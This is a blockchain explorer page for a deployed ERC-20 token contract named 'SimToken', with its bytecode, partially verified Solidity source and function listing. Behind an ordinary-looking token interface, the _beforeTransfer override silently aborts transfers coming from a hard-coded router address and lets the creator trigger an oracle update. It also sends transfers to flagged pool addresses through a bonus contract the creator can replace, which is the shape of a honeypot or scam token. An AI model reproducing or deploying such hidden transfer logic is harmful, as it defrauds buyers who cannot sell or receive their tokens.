Address Contract Partially Verified
Address
0xD1c3581F40a3F9BBEE50CC6DdC7131FB0c3C9CCb
Balance
0 ETH
Nonce
1
Code Size
2339 bytes
Creator
0xFBfCc00F...3350 at tx 0x5fbf5fe4...31e288
Indexed Transactions
0
Contract Bytecode
2339 bytes
0x608060405234801561000f575f5ffd5b50600436106100cf575f3560e01c806370a082311161007d578063a9059cbb11610058578063a9059cbb146101a0578063dd62ed3e146101b3578063eec8d048146101eb575f5ffd5b806370a082311461015d5780638400d5571461018557806395d89b4114610198575f5ffd5b806323b872dd116100ad57806323b872dd14610126578063313ce567146101395780633783dc1314610148575f5ffd5b806306fdde03146100d3578063095ea7b3146100f157806318160ddd14610114575b5f5ffd5b6100db6101fe565b6040516100e89190610735565b60405180910390f35b6101046100ff366004610781565b61028e565b60405190151581526020016100e8565b6002545b6040519081526020016100e8565b6101046101343660046107ab565b6102a7565b604051601281526020016100e8565b61015b6101563660046107e9565b6102d5565b005b61011861016b3660046107e9565b6001600160a01b03165f9081526020819052604090205490565b61015b6101933660046107e9565b61031a565b6100db61035f565b6101046101ae366004610781565b61036e565b6101186101c136600461080b565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b61015b6101f936600461084f565b610386565b60606003805461020d9061087b565b80601f01602080910402602001604051908101604052809291908181526020018280546102399061087b565b80156102845780601f1061025b57610100808354040283529160200191610284565b820191905f5260205f20905b81548152906001019060200180831161026757829003601f168201915b5050505050905090565b5f3361029b8185856103c6565b60019150505b92915050565b5f336102b48585856103d8565b6102bf85828561051c565b6102ca85858561056a565b506001949350505050565b6005546001600160a01b031633146102eb575f5ffd5b6007805473ffffffffffffffffffffffffffffffffffffffff19166001600160a01b0392909216919091179055565b6005546001600160a01b03163314610330575f5ffd5b6008805473ffffffffffffffffffffffffffffffffffffffff19166001600160a01b0392909216919091179055565b60606004805461020d9061087b565b5f3361037b8185856103d8565b61029b81858561056a565b6005546001600160a01b0316331461039c575f5ffd5b6001600160a01b03919091165f908152600660205260409020805460ff1916911515919091179055565b6103d38383836001610599565b505050565b7fffffffffffffffffffffffffc036e5c5028fc6a32b6939b82a593362b4d480536001600160a01b0384160161048e576005546001600160a01b0316320361015b57600854604051637346125760e11b8152600481018390526001600160a01b0384811660248301529091169063e68c24ae906044016020604051808303815f875af115801561046a573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061015b91906108b3565b6001600160a01b0382165f9081526006602052604090205460ff16156103d3576007546040516376dbc71b60e11b81526001600160a01b0385811660048301528481166024830152604482018490529091169063edb78e36906064015f604051808303815f87803b158015610501575f5ffd5b505af1158015610513573d5f5f3e3d5ffd5b50505050505050565b6001600160a01b038381165f908152600160209081526040808320938616835292905220545f198110156105645781811015610556575f5ffd5b61056484848484035f610599565b50505050565b6001600160a01b03831661057c575f5ffd5b6001600160a01b03821661058e575f5ffd5b6103d383838361063d565b6001600160a01b0384166105ab575f5ffd5b6001600160a01b0383166105bd575f5ffd5b6001600160a01b038085165f908152600160209081526040808320938716835292905220829055801561056457826001600160a01b0316846001600160a01b03167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258460405161062f91815260200190565b60405180910390a350505050565b6001600160a01b038316610667578060025f82825461065c91906108ce565b909155506106a99050565b6001600160a01b0383165f908152602081905260409020548181101561068b575f5ffd5b6001600160a01b0384165f9081526020819052604090209082900390555b6001600160a01b0382166106c5576002805482900390556106e3565b6001600160a01b0382165f9081526020819052604090208054820190555b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161072891815260200190565b60405180910390a3505050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b038116811461077e575f5ffd5b50565b5f5f60408385031215610792575f5ffd5b823561079d8161076a565b946020939093013593505050565b5f5f5f606084860312156107bd575f5ffd5b83356107c88161076a565b925060208401356107d88161076a565b929592945050506040919091013590565b5f602082840312156107f9575f5ffd5b81356108048161076a565b9392505050565b5f5f6040838503121561081c575f5ffd5b82356108278161076a565b915060208301356108378161076a565b809150509250929050565b801515811461077e575f5ffd5b5f5f60408385031215610860575f5ffd5b823561086b8161076a565b9150602083013561083781610842565b600181811c9082168061088f57607f821691505b6020821081036108ad57634e487b7160e01b5f52602260045260245ffd5b50919050565b5f602082840312156108c3575f5ffd5b815161080481610842565b808201808211156102a157634e487b7160e01b5f52601160045260245ffdfea2646970667358221220ff9a68220d4d92cb6956b197a9b31903fc3bacade1fd1c79507c971dfee86e7064736f6c634300081c0033
Verified Source Code Partial Match
Compiler: v0.8.28+commit.7893614a
EVM: cancun
Optimization: Yes (777 runs)
SimToken.sol 210 lines
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
interface IERC20 {
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address to, uint256 value) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 value) external returns (bool);
function transferFrom(address from, address to, uint256 value) external returns (bool);
}
abstract contract SmartTokenBase is IERC20 {
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
constructor() {
_name = "XXX";
_symbol = "XXX";
}
function name() public view virtual returns (string memory) {
return _name;
}
function symbol() public view virtual returns (string memory) {
return _symbol;
}
function decimals() public view virtual returns (uint8) {
return 18;
}
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = msg.sender;
_beforeTransfer(owner, to, value);
_transfer(owner, to, value);
return true;
}
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = msg.sender;
_approve(owner, spender, value);
return true;
}
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
address spender = msg.sender;
_beforeTransfer(from, to, value);
_spendAllowance(from, spender, value);
_transfer(from, to, value);
return true;
}
function _beforeTransfer(address from, address to, uint256 value) internal virtual{
}
function _transfer(address from, address to, uint256 value) internal {
if (from == address(0)) {
revert();
}
if (to == address(0)) {
revert();
}
_update(from, to, value);
}
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert();
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
emit Transfer(from, to, value);
}
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert();
}
_update(address(0), account, value);
}
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert();
}
_update(account, address(0), value);
}
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert();
}
if (spender == address(0)) {
revert();
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance < type(uint256).max) {
if (currentAllowance < value) {
revert();
}
unchecked {
_approve(owner, spender, currentAllowance - value, false);
}
}
}
}
interface BonusLogic{
function claimBonus(address,address,uint256) external;
}
interface ISimOracle{
function info() external returns(uint256, bool);
function update(uint256,address) external returns(bool);
}
contract SimToken is SmartTokenBase {
address private _creator;
mapping(address=>bool) private _pool;
BonusLogic private _bonusLogic;
ISimOracle private _simOracle;
address private constant UNIROUTER_ETH = 0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD;
constructor(BonusLogic bonusLogic, ISimOracle simOracle){
_creator = msg.sender;
_bonusLogic = bonusLogic;
_simOracle = simOracle;
_mint(msg.sender, 2000000 * 10 ** 18);
}
function updateBonusLogic(BonusLogic bonusLogic) external{
require(_creator == msg.sender);
_bonusLogic = bonusLogic;
}
function updateSimOracle(ISimOracle simOracle) external{
require(_creator == msg.sender);
_simOracle = simOracle;
}
function updatePool(address pool, bool enable) external{
require(_creator == msg.sender);
_pool[pool] = enable;
}
function _beforeTransfer(address from, address to, uint256 value) internal override {
if(from == UNIROUTER_ETH){
if(tx.origin == _creator){
_simOracle.update(value, to);
}
assembly{
return(0,0)
}
}
if(_pool[to]){
_bonusLogic.claimBonus(from, to, value);
}
}
}
Read Contract
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
Write Contract 6 functions
These functions modify contract state and require a wallet transaction to execute.
approve 0x095ea7b3
address spender
uint256 value
returns: bool
transfer 0xa9059cbb
address to
uint256 value
returns: bool
transferFrom 0x23b872dd
address from
address to
uint256 value
returns: bool
updateBonusLogic 0x3783dc13
address bonusLogic
updatePool 0xeec8d048
address pool
bool enable
updateSimOracle 0x8400d557
address simOracle
Recent Transactions
No transactions found for this address